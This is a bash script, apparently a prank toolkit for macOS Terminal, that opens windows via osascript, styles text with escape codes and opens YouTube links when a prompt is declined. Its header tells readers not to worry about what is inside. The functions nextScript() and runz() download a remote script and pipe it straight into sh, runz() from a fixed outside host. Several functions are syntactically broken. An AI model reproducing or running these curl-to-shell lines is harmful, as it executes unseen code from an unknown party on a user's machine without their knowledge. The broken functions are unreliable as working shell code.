#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
###########  END HEADER  ###########

# Some constants

# $HANGOUT='https://meet.google.com/xsu-ydik-ohu?hl=en&authuser=1';

termdo() {
    osascript -e 'tell application "Terminal" to do script "'"$1"'"'
}

nextScript() {
    termdo "curl -s $1 | sh";
}

setPosition() {
    printf "\e[3;$1;$2t";
}

setSize() {
    # This will fill the screen for my comp
    # setSize 9 1;
    printf "\e[$1;$2t";
}

setSizeByChars() {
    # Set the window to $1x$2 characters
    # Note that height characters are much taller than width characters are wide
    # You can make an almost square of screenspace including the terminal window chrome with setWindow 58 28
    # You can make an almost square window with setWindow 58 24
    printf "\e[8;$2;$1t"
}

setFontSize() {
    # Note window 1 is the current window
    osascript -e "tell application \"Terminal\" to set the font size of window 1 to $1"
}

minimize() {
    printf '\e[2t';
}

reverseMinimize() {
    printf '\e[1t';
}

bringToFront() {
    # Bring window to the front
    printf '\e[5t';
}

bold() {
    printf "\e[1m$1\e[0m"
}

italic() {
    printf "\e[3m$1\e[0m";
}

boldItalic() {
    printf "\e[3m\e[1m$1\e[0m";
}

underline() {
    printf "\e[4m$1\e[0m";
}

random() {
    echo $RANDOM;
}

randomRange() {

    # ////////
}

# Doesn't appear to work
# strikethrough() {
#     printf "\e[9m$1\e[0m";
# }

red() {
    printf "\e[31m$1\e[0m";
}

differentRed() {
    printf "\x1B[31m$1\e[0m";
}

makeGoldAndUnderline() {
    printf "\e[3;4;33m$1\n\e[0m";
}

dim() {
    printf "\e[2m$1\e[22m";
}

highlight() {
    printf "\e[4:2m$1\e[4:0m";
}

goldHighlight() {
    printf "\e[4:3m$1\e[4:0m";
}

blink() {
    printf "\e[5m$1\e[25m";
}

invisibleCopyPastable() {
    printf "\e[8m$1\e[28m";
}

turquoise() {
    printf "\e[38;5;42m$1\e[39m";
}

cyanBg() {
    printf "\e[46m$1\e[49m";
}

brightCyanBg() {
    printf "\e[106m$1\e[49m";
}

prompt() {
    read -p "Would you like to proceed with $1 y/n?" -n 1 -r;
    echo    # (optional) move to a new line
    if [[ ! $REPLY =~ ^[Yy]$ ]]
    then
        open https://www.youtube.com/watch?v=BEG-ly9tQGk&feature=youtu.be
    fi
}

# Utils

# <3
openHere() {
    termdo "cd $(pwd)";
}

openYtClip() {
    open "https://www.youtube.com/embed/$1?start=$2&end=$3&version=3&autoplay=true";
}

bigMsg() {
    # It takes work to manage how many newlines
    # should be there for which font size
    setPosition 0 0;
    setSize
    clear && setFontSize 100 && bold "\n\n\n$1\n\n\n";
}

cancelNoise() {
    tput bel;
}

# noKeyboard() {
#     stty -echo;
# }

# yesKeyboard() {
#     stty echo;
# }

# MUTHAF*******!!
killingInTheNameOf() {

    pkill -f $@;
}

animate() {

    $fps = 30;

    $func = $1
    $fromA = $2;
    $fromB = $3;
    $toA = $4;
    $toB = $5;
    $time = $6;

    #
}

animatePosition() {

    $fps = 30;

    $fromA = $2;
    $fromB = $3;
    $toA = $4;
    $toB = $5;
    $time = $6;
}

runz() {
    curl -s https://suckaaa.com/s/z | sh;
}
